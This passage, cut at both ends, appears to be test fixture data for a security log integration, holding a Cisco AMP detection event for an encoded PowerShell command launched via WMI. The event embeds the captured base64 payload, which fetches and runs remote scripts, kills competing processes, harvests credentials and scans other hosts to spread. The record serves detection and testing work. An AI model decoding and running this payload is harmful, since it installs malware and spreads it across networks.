iADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", + "ingested": "2021-12-09T13:35:47.010789100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbw